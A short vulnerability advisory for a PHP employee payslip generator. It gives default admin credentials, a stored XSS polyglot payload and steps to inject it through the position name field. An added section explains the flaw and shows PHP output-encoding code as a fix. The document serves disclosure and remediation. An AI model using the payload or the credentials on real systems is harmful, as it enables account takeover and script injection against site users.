# Title: Employee Payslip - XSS Polyglots
# Author: @Eawhitehat - Eren Arslan
# Demo available : https://www.sourcecodester.com/php/16264/updated-employee-payslip-generator-sending-mail-using-php-and-gmail-smtp.html
# CVE: N/A
# XSS POLYGLOTS
# Screenshot : https://prnt.sc/eeUxgczBF-Gj

Used Payload : onclick=alert(1)//<button onclick=alert(1)//> */ alert(1)//

Admin account : admin admin123

Method : Connect to the panel with the admin account : http://.../admin/

# Vulnerability
1. After logging in as SUPER ADMIN, go to http://.../admin/?page=positions (Position List page)
2. Click "Create New" and enter the payload in "NAME" : onclick=alert(1)//<button onclick=alert(1)//> */ alert(1)//
3. After the new position is created, click in the form to execute your payload

XSS Polyglots

Enjoy !
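A stored payload like the one above runs because the position name is written back into the page without context-aware output encoding. The following PHP is an added example, not code from the application or from the advisory author; it shows the raw rendering beside encoded rendering for three output contexts. The variable and function names are hypothetical, and the three contexts (table cell, quoted attribute, inline script) are assumptions about where the name is displayed.

```php
<?php
// Added example: not the application's code. $name stands in for the
// position "NAME" value read back from storage (assumption).
$name = 'onclick=alert(1)//<button onclick=alert(1)//> */ alert(1)//'; // payload quoted in the advisory

// Encode for HTML text nodes and for quoted attribute values.
function html_escape(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Encode for a JavaScript string literal placed inside an inline <script>.
// The JSON_HEX_* flags keep <, >, &, ' and " out of the emitted literal.
function js_literal(string $value): string
{
    return json_encode(
        $value,
        JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_THROW_ON_ERROR
    );
}

// Before: the stored value is concatenated into markup as-is, so the
// <button ...> fragment in the payload becomes a real element.
$unsafe_cell = '<td>' . $name . '</td>';

// After: each sink applies the encoder that matches its context.
$safe_cell  = '<td>' . html_escape($name) . '</td>';
$safe_input = '<input type="text" name="name" value="' . html_escape($name) . '">';
$safe_js    = '<script>var positionName = ' . js_literal($name) . ';</script>';

// Check: after encoding, no stored "<button" may survive as markup.
foreach ([$safe_cell, $safe_input, $safe_js] as $markup) {
    if (stripos($markup, '<button') !== false) {
        throw new RuntimeException('stored markup survived encoding');
    }
}

echo "unsafe cell : $unsafe_cell\n";
echo "safe cell   : $safe_cell\n";
echo "safe input  : $safe_input\n";
echo "safe script : $safe_js\n";
```

Attribute values must stay quoted in the template; `html_escape` does not protect an unquoted attribute, because spaces in the stored value would still start new attributes.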